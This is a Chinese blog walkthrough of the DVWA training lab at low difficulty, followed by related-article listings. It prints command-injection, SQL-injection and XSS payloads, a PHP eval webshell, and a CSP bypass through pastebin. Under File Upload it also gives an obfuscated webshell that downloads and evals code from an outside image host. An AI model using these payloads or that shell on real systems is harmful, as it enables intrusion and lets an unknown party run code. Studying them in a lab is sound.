DVWA简单难度

最新推荐文章于 2024-08-01 01:48:28 发布
最新推荐文章于 2024-08-01 01:48:28 发布
阅读量450 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CJB6988125/article/details/89766326
版权
本文围绕DVWA简单难度展开多种漏洞测试。包括使用Burp抓包和字典爆破进行暴力破解登录,通过命令注入列根目录,文件包含读取服务器密码,上传PHP木马并连接,SQL注入获取表名和数据库名,XSS攻击弹对话框,绕过CSP限制,以及获取JavaScript的正确Token等操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

DVWA简单难度

Brute Force = 尝试登录成功

Burp抓包->发送到Intruder->猜测用户名为admin->用字典爆破
得到密码password
在这里插入图片描述

Command Injection = 尝试在服务器上列根目录

输入127.0.0.1&&ls /

File Inclusion = 尝试读取到服务器的密码

输入etc/passwd
得到

root: x:0:0:root:/root:/bin/bash daemon: x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
然后不会了。。

File Upload = 上传一个PHP木马,并连接成功

上传一句话木马<?php eval($_POST['aa']);?>
访问https://sqli-lab.practice.rois.io/hackable/uploads/1.php
在这里插入图片描述用菜刀无法连接总是出现500
百度找过狗一句话
最后找到一个可以用的

 <?php

$password='myhack58';//登录密码(支持菜刀)

//----------功能程序------------------//

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?>

在这里插入图片描述

SQL Injection = 尝试拿到当前表名

依次输入
1’ union select 1,database()#
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#
得到表名 guestbook,users
在这里插入图片描述

SQL Injection (Blind) = 尝试拿到当前数据库名

1.输入1’ and length(database())>4#提示不存在
输入1’ and length(database())>3#存在,所以数据库名的长度为4
2.然后用1’ and ascii(substr(database(),n,1))>100#来获得数据库名
3.最后得到数据库名为dvwa

XSS (DOM) = 尝试弹一个对话框

在这里插入图片描述
查看源代码发现上述位置可以进行XSS攻击
访问https://sqli-lab.practice.rois.io/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(0)%3C/script%3E 即可
在这里插入图片描述

XSS (Reflected) = 尝试弹一个对话框

在这里插入图片描述
输入直接输入<script>alert(0)</script>即可
在这里插入图片描述

XSS (Stored) = 尝试弹一个对话框

在这里插入图片描述直接输入<script>alert(0)</script>即可
在这里插入图片描述

CSP Bypass = 尝试弹一个对话框

查看源代码
Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;

发现可以加载https://pastebin.com中的script
去https://pastebin.com发布alert(1)
在输入框中填入https://pastebin.com/raw/HLLRVw2F
成功弹出一个对话框
在这里插入图片描述

JavaScript = 尝试拿到正确的Token

提交success发现提示错误的token
看源代码发现token是在前台生成的所以只要输入success在执行一次generate_token()就可以了
在这里插入图片描述token=38581812b435834ebf84ebcc2c6424d6

ccreater
关注
dvwa-简单
lwbcsd的博客
01-25 834
Brute Force(Low) 从页面中可以看出这是一个输入账户和密码题。 方法一 用burp进行暴力破解 方法二 看页面是否有sql注入,显然这个页面是存在sql注入的。
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 10万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
Dvwa的低难度通关
h0ld1rs的博客
07-31 560
目录搭建低难度通关brute forceCommand InjectionCSRFFile InclusionFile Upload 搭建 使用docker搭建 docker search dvwa docker pull xxx docker run xxx 详细说一下搭建后的情况 低难度通关 搭建好后想先看一下源代码的,然后发现有这么多种php文件,应该是说的表示难度难度的选择在这里更改 brute force 查看low.php的源代码 发现没有任何的防御手段,我们直接用burp抓包,进
dvwa通关(初级)
weixin_63154145的博客
02-07 265
dvwa通关(初级)
DVWA Brute Force(low)
tb_youth的博客
12-07 366
0x00 设置安全水平 小白刚接触DVWA,先从简单的开始 00x1 Brute Force(蛮力:爆破) 0x02 开启firefox代理 首选项 0x03 使用brupsuite爆破 输入: admin 123456 点击登入 在http history中找到目标,然后将它送至爆破页 转到爆破页: 设置爆破参数,这里只需要设置两个爆破参数 一个是username,另一个是passwor...
dvwa brute force(暴力破解)
一个安全研究员
04-26 2775
介绍 暴力破解其实没有什么神秘的,也是大家都有的一个四位方式,比如说我们有时候会忘记我们的手机密码,这个时候我们就会从我们之前使用的密码中一个个去试着解锁,这就是暴力破解的精髓所在了,也就是枚举猜解。所以暴力破解的前提就是你有一个强大的字典,字典就是我们已知的一些用户名和密码,我们会通过这个字典来猜解。 low 方法一: 我们可以直接使用burpsuite的intruder模块进行暴力...
dvwa靶场文件上传--high难度--蚁剑连接
2401_85397851的博客
08-01 1215
选择DVWA Security,把impossible改成high(其他模式也改成high),改好之后再选择File Upload,如果把安全等级调成高了以后,我们只能上传像jpg,png,jpeg(这种后缀的)的图片,而且注意,上传的高度不能超过100KB,如果想要了解的,可以查看网页源代码或者看一下。如果损坏是传不上去的。
DVWA难度PHP代码审计分析:安全漏洞与修复
DVWA(Damn Vulnerable Web Application)是一个用于安全教育的开源Web应用,其中包含了许多常见漏洞,如这里的高难度代码审计问题。这段代码展示了一个简单的命令注入漏洞,我们可以深入探讨相关知识点。 首先,...
DVWA-master 靶场环境
最新发布
02-22
DVWA的设计非常贴近真实的应用场景,它允许用户进行各种配置,包括设置安全难度等级,从而使得这个练习靶场既能适用于初学者,又能适应高级用户的需要。在较低的安全难度下,用户可以清楚地看到漏洞是如何被利用的,...
20201225DVWA暴力破解(Brute Force)模块全难度详解
qq_45290991的博客
12-30 751
一、low级别 low级别直接用BP爆破就好了,先看源码: Brute Force Source vulnerabilities/brute/source/low.php <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5(
DVWA靶场通关----(1) Brute Force教程
z09364517158的博客
04-02 1159
另外在这个Medium难度的源码中,它对防止注入做了很多的工作,像比如说,它使用了mysql_real_escape_string 函数,这个函数可以对字符串中的函数进行转义,一定程度上可以防止sql注入,到这个地方会不会想到在Low难度中是否可以通过注入来绕过,可以去试一下。关于Medium难度,它的源码中对于登录这一方面并没有做太多的改动,因此它的爆破过程与Low难度的过程基本一样,想要尝试的朋友可以参考Low难度中的爆破过程,区别是每一次登录失败后会延时2s,别的就没有什么改动了,总体过程影响不大。
DVWA--Brute Force(暴力破解)
weixin_50342860的博客
08-19 230
目录风险mediumhigh修复 风险 在不知道用户的账号和密码的情况下,通过自动化工具或者强大的字典去进行连续性尝试,去碰撞出一些有效的账号密码,一般用来破解后台管理系统的登录。 medium 将DVWA的级别调为Medium后,进入Brute Force 输入一个账号与密码,使用burp进行抓包 右击发送到 intruder模块,将账号与密码设为变量,爆破模式选为Cluster bomb 在 Payloads 中,Payload set 选择使用 Simple list ,将用户字典和密码字典分别添加
DVWA 中等难度
h0ld1rs的博客
08-02 633
文章目录Brute ForceCommand InjectionCSRFFile InclusionFile UploadSQL InjectionSQL Injection (Blind)XSS (Reflected)XSS (Stored) Brute Force 相比较,多了这几行代码 然而多出来的这个函数mysql_real_escape_string( $user )就是对一些特殊字符进行了转义,在low难度下可以利用注释#,将sql语句改写。这里就不能了。这里还是可以利用burp进行强爆破。
DVWA难度(1-4)
weixin_50998641的博客
01-24 751
1.Brute Force( 暴力破解) 开始页面 Username默认为admin 直接使用burp进行爆破 所以密码就是password 输入之后跳转 第一关就OK了 需要注意的是:如果Burp代理使用火狐浏览器自带的代理,则无法抓取本地DVWA数据流量包 有两种解决方法: **一: 把本地的localhost/127.0.0.1换成本机IP ** 二:使用浏览器插件进行代理,不用浏览器本身自带的代理 2.Command Injection( 命令行注入 ) 首先需要了解命令连接符 comma
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3048
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
dvwa Brute Force(暴力破解)通关手册
lyy0xfff的博客
07-19 318
Preface 同上一篇命令执行,同样也是复习明天的考试,从而自己写一篇博客,关于暴力破解,实际上就是运用到我们的burp的intruder模块和一些密码字典来进行暴力破解密码 Main Body 0x00 我们首先打开我们的DVWA靶场 其实这个就是让我们爆破密码,我们用burp的intruder模块 假设我们已经知道用户名,只需要去猜解它的密码,我们通过抓包,然后发送到爆破模块,把密码当成变量 首先当密码不正确的时候返回的页面如下表 密码正确的时候返回 0x01 我们将将密码设置为变量 然后加载
DVWA-----Brute Force
Fly_Mojito的博客
01-12 271
DVWA-----Brute Force三种难度破解方法
DVWA靶场-BruteForce·low~教程
m0_63936639的博客
05-24 542
brute force名为蛮力,此时此刻,我们的任务就是将这个页面可以成功的login in,当然我们现在并不知道正确的username以及password...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值